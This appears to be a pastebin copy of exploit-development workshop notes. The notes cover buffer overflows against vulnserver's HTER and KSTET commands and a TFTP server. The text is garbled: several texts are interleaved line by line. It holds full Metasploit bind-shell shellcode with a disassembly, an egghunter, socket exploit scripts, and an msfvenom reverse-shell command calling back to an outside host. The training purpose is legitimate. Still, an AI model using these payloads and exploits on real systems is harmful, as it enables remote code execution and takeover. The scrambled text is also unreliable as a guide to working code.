shellcode += "\xd2\xd3\x72\x96\xb6\xdf\xf9\xfa\x22\x6b\x8f\xd2\x45"
shellcode += "\xdc\x3a\x05\x68\xdd\x17\x75\xeb\x5d\x6a\xaa\xcb\x5c"
																	^					
shellcode += "\xa5\xbf\x0a\x98\xd8\x32\x5e\x71\x96\xe1\x4e\xf6\xe2"
4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
shellcode += "\x39\xe5\x44\xe2\x39\x1a\x1c\x05\x6b\x8d\x16\x5c\xab"
shellcode += "\x2c\xfa\xd4\xe2\x36\x1f\xd0\xbd\xcd\xeb\xae\x3f\x07"
shellcode += "\x22\x4e\x93\x66\x8a\xbd\xed\xaf\x2d\x5e\x98\xd9\x4d"
#########################################
shellcode += "\xe3\x9b\x1e\x2f\x3f\x29\x84\x97\xb4\x89\x60\x29\x18"
# Lab 2c: Not Enough Space (Trampoline) #
shellcode += "\x4f\xe3\x25\xd5\x1b\xab\x29\xe8\xc8\xc0\x56\x61\xef"
#########################################
shellcode += "\x06\xdf\x31\xd4\x82\xbb\xe2\x75\x93\x61\x44\x89\xc3"
shellcode += "\xc9\x39\x2f\x88\xe4\x2e\x42\xd3\x60\x82\x6f\xeb\x70"
shellcode += "\x8c\xf8\x98\x42\x13\x53\x36\xef\xdc\x7d\xc1\x10\xf7"
shellcode += "\x3a\x5d\xef\xf8\x3a\x74\x34\xac\x6a\xee\x9d\xcd\xe0"
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
shellcode += "\xee\x22\x18\xa6\xbe\x8c\xf3\x07\x6e\x6d\xa4\xef\x64"
shellcode += "\x62\x9b\x10\x87\xa8\xb4\xbb\x72\x3b\x7b\x93\x7e\x39"
shellcode += "\x13\xe6\x7e\x2c\xb8\x6f\x98\x24\x50\x26\x33\xd1\xc9"
shellcode += "\x63\xcf\x40\x15\xbe\xaa\x43\x9d\x4d\x4b\x0d\x56\x3b"
On the Strategicsec-XP-ED-Target-VM VM
shellcode += "\x5f\xfa\x96\x76\x3d\xad\xa9\xac\x29\x31\x3b\x2b\xa9"
shellcode += "\x3c\x20\xe4\xfe\x69\x96\xfd\x6a\x84\x81\x57\x88\x55"
- open a command prompt
shellcode += "\x57\x9f\x08\x82\xa4\x1e\x91\x47\x90\x04\x81\x91\x19"
- c:\software\tftpd32
shellcode += "\x01\xf5\x4d\x4c\xdf\xa3\x2b\x26\x91\x1d\xe2\x95\x7b"
- run tftpd32.exe
shellcode += "\xc9\x73\xd6\xbb\x8f\x7b\x33\x4a\x6f\xcd\xea\x0b\x90"
- UDP port 69
shellcode += "\xe2\x7a\x9c\xe9\x1e\x1b\x63\x20\x9b\x2b\x2e\x68\x8a"
(socket code is already in the scripts)
shellcode += "\xa3\xf7\xf9\x8e\xa9\x07\xd4\xcd\xd7\x8b\xdc\xad\x23"
shellcode += "\x93\x95\xa8\x68\x13\x46\xc1\xe1\xf6\x68\x76\x01\xd3"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

On your attack host please install:
egg = "\x54\x30\x30\x57"	# 0x57303054


  NASM - Netwide Assembler
# 62501205 from essfunc.dll	JMP ESP

# eb b8		jmp short

buffer = "KSTET /.:/" + egghunter + "\xCC" * (66 - len(egghunter)) + "\x05\x12\x50\x62" + "\xeb\xb8" + "C" * (5011 - 66 - 4 - 2)

-----------------------------------------------------------------------------------------------------------------
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
We want to generate the shellcode (BIND SHELL on Port 4444)

- No restricted characters
expl.send("GDOG " + egg + egg + shellcode)
- Encoder: NONE
expl.recv(1024)

Create a Python file called dumpshellcode.py
expl.send(buffer)
expl.close()
---

#!/usr/bin/python2
--------------------------------------------------------------


- The memory can be searched in OllyDbg for a pattern. The memory where the our egg code resides
import struct



# win32_bind -  EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com

shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
You can download the attack scripts from today from here:
shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"

shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"

shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
Quick challenge:
shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.
shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"

shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"

shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"

shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"

shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"

shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"

shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"

shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"

shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"

shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
*****************************************************
shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
* Vulnserver – HTER command buffer overflow exploit *
shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
*****************************************************
shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"

shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
- HTER command of VulnServer has a vulnerability. Let us try to create an exploit for this vulnerability.
shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

 
sys.stdout.write(shellcode)

---
- The PoC python script:

--------------------------Code--------------------------------

python dumpshell.py > bindshell.bin
#!/usr/bin/python

copy bindshellcode.bin into the "c:\Program Files\nasm" directory

import os
import sys

Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
buffer = "HTER " + "A" * 2106
317 bindshell.bin

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
expl.send(buffer)
expl.close()

00000000  FC                cld
------------------------------------------------------------
00000001  6AEB              push byte -0x15

00000003  4D                dec ebp
- The script sends A characters. However the EIP is overwritten with 0xAAAAAAAA, instead of 0x41414141.
00000004  E8F9FFFFFF        call dword 0x2

00000009  60                pushad
- It seems our buffer is somehow converted into hex byte array. Let us make a test, send a byte which contains 0123456789abcdef twice and check it in the memory. The buffer:
0000000A  8B6C2424          mov ebp,[esp+0x24]

0000000E  8B453C            mov eax,[ebp+0x3c]
   buffer = “HTER ” + “0123456789abcdef0123456789abcdef” + “A” * 2106
00000011  8B7C0578          mov edi,[ebp+eax+0x78]

00000015  01EF              add edi,ebp

00000017  8B4F18            mov ecx,[edi+0x18]
- Our hypothesis seems to correct, however the first “0” character was removed. Let us change “HTER” to “HTER 0“. Now the shellcode can be appended right after this string.
0000001A  8B5F20            mov ebx,[edi+0x20]

0000001D  01EB              add ebx,ebp

0000001F  49                dec ecx
1. Identify the position of EIP
00000020  8B348B            mov esi,[ebx+ecx*4]

00000023  01EE              add esi,ebp
- We cannot use the Metasploit module, because the buffer is converted and it would not work. We have to use a different method. We can send a crafted buffer which contains only 0-9 and a-f characters and check the EIP. I use the same PoC script and only show you how the buffer is created.
00000025  31C0              xor eax,eax

00000027  99                cdq
- The first iteration:
00000028  AC                lodsb

00000029  84C0              test al,al
buffer = “HTER 0”
0000002B  7407              jz 0x34

0000002D  C1CA0D            ror edx,0xd
buffer += “1” * 200
00000030  01C2              add edx,eax
buffer += “2” * 200 
00000032  EBF4              jmp short 0x28
buffer += “3” * 200 
00000034  3B542428          cmp edx,[esp+0x28]
buffer += “4” * 200 
00000038  75E5              jnz 0x1f
buffer += “5” * 200 
0000003A  8B5F24            mov ebx,[edi+0x24]
buffer += “6” * 200 
0000003D  01EB              add ebx,ebp
buffer += “7” * 200 
0000003F  668B0C4B          mov cx,[ebx+ecx*2]
buffer += “8” * 200 
00000043  8B5F1C            mov ebx,[edi+0x1c]
buffer += “9” * 200 
00000046  01EB              add ebx,ebp
buffer += “a” * 200 
00000048  032C8B            add ebp,[ebx+ecx*4]
buffer += “b” * 200 
0000004B  896C241C          mov [esp+0x1c],ebp
buffer += “c” * 200
0000004F  61                popad

00000050  C3                ret
The value of EIP: BBBBBBBB. Great! The position of RET value is after 2000 byte.
00000051  31DB              xor ebx,ebx

00000053  648B4330          mov eax,[fs:ebx+0x30]

00000057  8B400C            mov eax,[eax+0xc]

0000005A  8B701C            mov esi,[eax+0x1c]
- The second iteration:
0000005D  AD                lodsd

0000005E  8B4008            mov eax,[eax+0x8]
buffer = “HTER 0” + “A” * 2000
00000061  5E                pop esi

00000062  688E4E0EEC        push dword 0xec0e4e8e
buffer += “1” * 20
00000067  50                push eax
buffer += “2” * 20 
00000068  FFD6              call esi
buffer += “3” * 20 
0000006A  6653              push bx
buffer += “4” * 20 
0000006C  66683332          push word 0x3233
buffer += “5” * 20 
00000070  687773325F        push dword 0x5f327377
buffer += “6” * 20 
00000075  54                push esp
buffer += “7” * 20 
00000076  FFD0              call eax
buffer += “8” * 20 
00000078  68CBEDFC3B        push dword 0x3bfcedcb
buffer += “9” * 20 
0000007D  50                push eax
buffer += “a” * 20
0000007E  FFD6              call esi                     PART 1

00000080  5F                pop edi
The value of EIP: 33333333. Great! The position of RET value is after 2040 byte.
00000081  89E5              mov ebp,esp

00000083  6681ED0802        sub bp,0x208

00000088  55                push ebp

00000089  6A02              push byte +0x2
- The third iteration:
0000008B  FFD0              call eax

0000008D  68D909F5AD        push dword 0xadf509d9
buffer = “HTER 0” + “A” * 2040
00000092  57                push edi

00000093  FFD6              call esi
buffer += “1” * 2
00000095  53                push ebx
buffer += “2” * 2 
00000096  53                push ebx
buffer += “3” * 2 
--------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
buffer += “4” * 2 
00000097  53                push ebx
buffer += “5” * 2 
00000098  53                push ebx
buffer += “6” * 2 
00000099  53                push ebx
buffer += “7” * 2 
0000009A  43                inc ebx
buffer += “8” * 2 
0000009B  53                push ebx
buffer += “9” * 2 
0000009C  43                inc ebx
buffer += “a” * 2
0000009D  53                push ebx                       PART 2

0000009E  FFD0              call eax
- The value of EIP: 44332211. Great! We found the position of the bytes which will be written into EIP.
000000A0  6668115C          push word 0x5c11

000000A4  6653              push bx

000000A6  89E1              mov ecx,esp

000000A8  95                xchg eax,ebp
- Test it with the following script:
000000A9  68A41A70C7        push dword 0xc7701aa4

000000AE  57                push edi
--------------------------Code--------------------------------
000000AF  FFD6              call esi

000000B1  6A10              push byte +0x10
#!/usr/bin/python
000000B3  51                push ecx

000000B4  55                push ebp

000000B5  FFD0              call eax

000000B7  68A4AD2EE9        push dword 0xe92eada4

000000BC  57                push edi

000000BD  FFD6              call esi

000000BF  53                push ebx
buffer = "HTER 0" + "A" * 2040 + "42424242" + "A" * (4106 - 1 - 2040 - 8)
000000C0  55                push ebp

000000C1  FFD0              call eax
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
000000C3  68E5498649        push dword 0x498649e5
expl.connect(('127.0.0.1', 9999))
000000C8  57                push edi
expl.recv(100)
000000C9  FFD6              call esi
expl.send(buffer)
000000CB  50                push eax
expl.close()
000000CC  54                push esp

000000CD  54                push esp
-------------------------------------------------------------
000000CE  55                push ebp

000000CF  FFD0              call eax

000000D1  93                xchg eax,ebx
- The value of EIP: 42424242. It works fine! We can control the EIP register.
000000D2  68E779C679        push dword 0x79c679e7

000000D7  57                push edi

000000D8  FFD6              call esi
2. Find value for EIP
000000DA  55                push ebp

000000DB  FFD0              call eax
- The EAX register points to the beginning of our buffer, which starts after the “HTER 0” string. Find a JMP EAX value and update the script. Do not forget, that the address should be in reverse order. Place a breakpoint to the JMP EAX address and check whether the breakpoint is hit.
000000DD  666A64            push word 0x64

000000E0  6668636D          push word 0x6d63
- It works fine again. The final step is to add for example a reverse shell payload to the exploit.
000000E4  89E5              mov ebp,esp

000000E6  6A50              push byte +0x50

000000E8  59                pop ecx

000000E9  29CC              sub esp,ecx
3. Add shellcode to the exploit
000000EB  89E7              mov edi,esp

000000ED  6A44              push byte +0x44
Generate a shellcode with venom and add it to the script.
000000EF  89E2              mov edx,esp

000000F1  31C0              xor eax,eax
--------------------------Type this--------------------------------
000000F3  F3AA              rep stosb

000000F5  FE422D            inc byte [edx+0x2d]
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=192.168.2.130 LPORT=4444 > shellcode.bin
000000F8  FE422C            inc byte [edx+0x2c]

000000FB  93                xchg eax,ebx

000000FC  8D7A38            lea edi,[edx+0x38]
Hex values can be displayed with hexdump:
000000FF  AB                stosd

00000100  AB                stosd
--------------------------Type this--------------------------------
00000101  AB                stosd

00000102  6872FEB316        push dword 0x16b3fe72
hexdump -C shellcode.bin
00000107  FF7544            push dword [ebp+0x44]

0000010A  FFD6              call esi

0000010C  5B                pop ebx
- This will however not trigger the vulnerability. What is the problem? The shellcode must not contain double zero string (“00”)! Let us generate the shellcode again, but add -b ‘\x00’ to the parameter list of msfvenom.
0000010D  57                push edi

0000010E  52                push edx
--------------------------Type this--------------------------------
0000010F  51                push ecx
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=192.168.2.130 LPORT=4444 -b ‘\x00’ > shellcode.bin
00000110  51                push ecx

00000111  51                push ecx

00000112  6A01              push byte +0x1

00000114  51                push ecx
- Msfvenom uses shikata_ga_nai encoder automaticaly, because we specified bad characters with the -b option. The final shellcode size is 351 byte. Add it to the script and test it
00000115  51                push ecx

00000116  55                push ebp
--------------------------Code--------------------------------
00000117  51                push ecx

00000118  FFD0              call eax
#!/usr/bin/python
0000011A  68ADD905CE        push dword 0xce05d9ad

0000011F  53                push ebx

00000120  FFD6              call esi

00000122  6AFF              push byte -0x1

00000124  FF37              push dword [edi]

00000126  FFD0              call eax

00000128  8B57FC            mov edx,[edi-0x4]
shellcode = (
0000012B  83C464            add esp,byte +0x64
"bec9d8bc2cd9eed97424f45f2bc9b152"
0000012E  FFD6              call esi
"83c70431770e03bed65ed9bc0f1c223c"
00000130  52                push edx
"d041aad9e141c8aa52729afe5ef9ceea"
00000131  FFD0              call eax
"d58fc61d5d2531105e160133dc655693"
00000133  68F08A045F        push dword 0x5f048af0
"dda5abd21adb4686f397f53677edc5bd"
00000138  53                push ebx
"cbe34d229b027ff5975c5ff474d5d6ee"
00000139  FFD6              call esi
"99d0a1856aae334fa34f9fae0ba2e1f7"
0000013B  FFD0              call eax
"ac5d9401cfe0afd6ad3e25cc16b49d28"
"a6197bbba4d60fe3a8e9dc98d562e34e"
"5c30c04a04e269cbe045950b4b393340"
"662e4e0bef8363b3ef8bf4c0dd14af4e"
"6edc698991f7ce056cf82e0cabac7e26"
part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"1acd14b6a318bae60bf37b56eca313bc"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"e39c04bf29b5af3aba7a8746b813da46"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"adbf53a0a72f327b50c91ff7c1168a72"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"c19d39838c553797799602c52ca9b861"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"b2382771bd20f026ea9709a20681a3d0"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"da578b5001a41259c490304910187d3d"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"cc4f2bebaa399d4565957701f0d54757"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"fd333eb74cea07c8617a80b19f1a6f68"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"242a3a300da3e3a10fae131c53d79794"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
"2c2c87dd29680f0e40e1fa30f7022f"
)

part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
# 77DB0BCD from ntdll.dll
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"

part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
buffer = "HTER 0" + shellcode + "A" * (2040 - len(shellcode)) + "CD0BDB77" + "A" * (4106 - 1 - 2040 - 8)
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"

part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
expl.connect(('127.0.0.1', 9999))
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
expl.recv(100)
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
expl.send(buffer)
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
expl.close()
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"

part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
--------------------------------------------------------------


STACK SHIFTER:
- This will trigger the vulnerability. Our shellcode starts to execute, but later it causes an exception. Why?
prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  # add esp, -1001h

prepend += "\x44"                     # inc esp
- Check the value of EIP and ESP. EIP is the Instruction Pointer. The CPU executes the instruction, which is on this memory address and increments its value, thus moves to the next instruction. ESP is the Stack Pointer. Stack is a FIFO (First In First Out) and when a value is pushed onto the stack, the value of the ESP is decremented. EIP goes from low to high memory, ESP goes from high to low memory (if new values is being pushed onto the stack.)

- If EIP is bigger, than ESP, there is no problem as they are moving away from each other. If EIP is lower than ESP, a problem can raise as they go toward each other and the the program code might change if ESP reaches EIP.

- What is the solution? We have to set the ESP above the EIP. When we jump to the beginning of the shellcode, we can push the value of EAX, then pop this value into ESP. A couple NOP operation might also be necessary

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


---- final script ----
shellcode = (
"bec9d8bc2cd9eed97424f45f2bc9b152"
#!/usr/bin/python2
"83c70431770e03bed65ed9bc0f1c223c"
#TFTP Server remote Buffer Overflow
"d041aad9e141c8aa52729afe5ef9ceea"
"d58fc61d5d2531105e160133dc655693"
"dda5abd21adb4686f397f53677edc5bd"
"cbe34d229b027ff5975c5ff474d5d6ee"
import struct
"99d0a1856aae334fa34f9fae0ba2e1f7"
"ac5d9401cfe0afd6ad3e25cc16b49d28"
if len(sys.argv) < 2:
"a6197bbba4d60fe3a8e9dc98d562e34e"
	sys.stderr.write("Usage: tftpd.py <host>\n")
"5c30c04a04e269cbe045950b4b393340"
	sys.exit(1)
"662e4e0bef8363b3ef8bf4c0dd14af4e"
"6edc698991f7ce056cf82e0cabac7e26"
target = sys.argv[1]
"1acd14b6a318bae60bf37b56eca313bc"
port = 69
"e39c04bf29b5af3aba7a8746b813da46"
"adbf53a0a72f327b50c91ff7c1168a72"
eip = 0x7e429353         # jmp esp in USER32.DLL
"c19d39838c553797799602c52ca9b861"
"b2382771bd20f026ea9709a20681a3d0"
part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"da578b5001a41259c490304910187d3d"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"cc4f2bebaa399d4565957701f0d54757"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"fd333eb74cea07c8617a80b19f1a6f68"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"242a3a300da3e3a10fae131c53d79794"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"2c2c87dd29680f0e40e1fa30f7022f"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
)
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"

part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
nops = "90" * 32
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"

part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
# 77DB0BCD from ntdll.dll

part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
buffer = "HTER 0505c" + nops + shellcode + "A" * (2040 - 4 - len(nops) - len(shellcode)) + "CD0BDB77" + "A" * (4106 - 1 - 2040 - 8)
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"

part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
expl.connect(('127.0.0.1', 9999))
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
expl.recv(100)
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
expl.send(buffer)
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
expl.close()
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"

part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
--------------------------------------------------------------
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"

part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

You can download the attack scripts from today from here:
prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  			# add esp, -1001h

prepend += "\x44"                     			# inc esp

Quick challenge:
buf = "\x00\x01"         				# receive command
Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.

Public Pastes

DunderMifflin HTML Meta Tags for SEO
PHP | 28 min ago | 1.94 KB
2024-05-30_stats.json
JSON | 32 min ago | 9.12 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 🎁
GetText | 32 min ago | 0.38 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 🤑
GetText | 32 min ago | 0.39 KB
2024-05-30_stats.json
JSON | 34 min ago | 9.10 KB
2024-05-30_stats.json
JSON | 35 min ago | 9.05 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 🤑
GetText | 60 min ago | 0.49 KB
lab3
Python | 2 hours ago | 2.77 KB